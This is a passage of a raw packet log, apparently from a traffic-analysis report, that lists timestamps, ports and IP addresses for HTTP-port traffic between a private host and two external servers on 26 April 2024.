Apr 26, 2024 10:27:05.178397894 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.178435087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.178440094 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.178473949 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.178484917 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.178510904 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.178519011 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.178548098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.178553104 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.178592920 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.178651094 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.178688049 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.178697109 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.178733110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.178757906 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.178795099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.178803921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.178832054 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.178837061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.178869963 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.178877115 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.178909063 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.178914070 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.178946018 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.178951979 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.178983927 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.178992033 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.179022074 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.179027081 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.179058075 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.179064989 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.179096937 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.179104090 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.179135084 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.179140091 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.179171085 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.179177999 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.179208994 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.179214001 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.179245949 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.179253101 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.179286003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.179287910 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.179323912 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.179330111 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.179359913 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.179368973 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.179398060 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.179404020 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.179441929 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.179469109 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.179507017 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.179512978 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.179546118 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.179557085 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.179590940 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.179615974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.179655075 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.179658890 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.179692984 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.179699898 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.179744005 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.181215048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.181253910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.181292057 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.181308031 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.181334019 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.181521893 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.181539059 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.181556940 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.181566000 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.181576014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.181583881 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.181600094 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.181613922 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.181626081 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.181643963 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.181668043 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.181682110 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.182646990 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.182665110 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.182682037 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.182710886 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.182734013 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.186311007 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.186553955 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.186570883 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.186587095 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.186604977 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.186620951 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.186640024 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.186645985 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.186645985 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.186656952 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.186666965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.186676025 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.186682940 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.186682940 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.186686039 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.186703920 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.186716080 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.186721087 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.186738968 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.186741114 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.186752081 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.186779976 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.186857939 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.186899900 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.186911106 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.186928988 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.186950922 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.186964035 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.186988115 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.187005043 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.187022924 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.187027931 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.187040091 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.187047958 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.187067032 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.187073946 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.187083960 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.187084913 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.187102079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.187107086 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.187118053 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.187197924 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.187205076 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.187205076 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.187205076 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.187216997 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.187232971 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:05.187238932 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.187251091 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.187273026 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:05.349720955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.349806070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.349844933 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.349900961 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.349915028 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.349972010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.350003958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.350044012 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.350095987 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.350117922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.350189924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.350227118 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.350255966 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.350346088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.350404978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.350477934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.350502014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.350539923 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.350544930 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.350610971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.350682974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.350722075 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.350733995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.350768089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.350811958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.350889921 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.350982904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.351021051 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.351032972 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.351068020 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.351093054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.351130962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.351198912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.351248026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.351288080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.351335049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.351377964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.351449013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.351485968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.351531029 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.351571083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.351609945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.351617098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.351681948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.351752043 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.351794958 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.351798058 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.351834059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.351840973 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.351906061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.351988077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.352035046 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.352312088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.352353096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.352385044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.352437019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.352509022 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.352552891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.352567911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.352612019 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.352642059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.352679968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.352750063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.352793932 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.352814913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.352860928 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.352886915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.355324984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.355374098 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.355654955 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.355755091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.355823040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.355861902 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.355886936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.355923891 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.359955072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.359993935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360059977 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.360229015 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360270977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360307932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360358000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360361099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.360398054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360404968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.360435963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360474110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360522032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.360526085 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360564947 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360569954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.360603094 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360641003 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360677004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360690117 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.360714912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360724926 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.360753059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360790014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360826969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360835075 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.360871077 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360872030 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.360910892 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360949039 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.360984087 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.360986948 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361061096 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.361110926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361181974 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361252069 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361289978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361299992 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.361327887 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.361329079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361366987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361403942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361440897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361452103 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.361479998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361483097 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.361516953 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361556053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361592054 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361605883 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.361629963 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361634970 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.361668110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361738920 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361776114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361788034 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.361814976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361819983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.361852884 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361890078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.361933947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.361962080 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362011909 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.362035036 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362138987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362176895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362221956 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.362246990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362283945 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362289906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.362322092 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362360954 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362400055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362409115 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.362437010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362442017 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.362474918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362513065 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362550020 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362550974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.362587929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362591982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.362626076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362663031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362699986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362708092 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.362737894 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362749100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.362776041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362812996 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362848997 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362859964 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.362886906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362893105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.362925053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.362962961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.363002062 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.363007069 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.363040924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.363048077 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.363078117 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.363116026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.363152981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.363163948 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.363197088 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.365375042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.365413904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.365453959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.365490913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.365495920 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.365529060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.365535975 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.365566969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.365607023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.365650892 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.365814924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.365854979 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.365859032 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.365926981 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.365963936 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366002083 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366007090 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:05.366039038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:05.366044998 CEST	49734	80	192.168.2.4	176.97.76.106
